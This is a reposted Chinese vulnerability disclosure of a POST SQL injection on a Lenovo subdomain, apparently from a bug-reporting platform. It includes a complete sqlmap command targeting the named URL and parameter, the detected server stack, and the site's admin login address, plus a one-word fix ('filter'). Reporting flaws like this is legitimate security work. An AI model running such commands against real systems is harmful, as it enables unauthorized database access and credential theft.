今天看啥
热点:

联想某重要分站POST注入漏洞


联想某重要分站POST注入漏洞

sqlmap -u "http://yun.lenovo.com/join.php" --data="keywords=-1&search=" -p keywords --dbs
其中keyword存在注入
web application technology: Nginx, PHP 5.5.0back-end DBMS: MySQL 5只是证明注入存在,未深入。附:google发现此站管理后台地址,http://yun.lenovo.com/lxymanage/login.php,由于只是证明注入点,故没有查找数据库里账号密码。建议后台用robots.txt屏蔽。

解决方案:

过滤
 

www.bkjia.comtruehttp://www.bkjia.com/wzaq/1002623.htmlTechArticle联想某重要分站POST注入漏洞 联想某重要分站POST注入漏洞 sqlmap -u http://yun.lenovo.com/join.php --data=keywords=-1search= -p keywords --dbs 其中keyword存在注...

相关文章

相关搜索: 漏洞 分站

帮客评论

视觉看点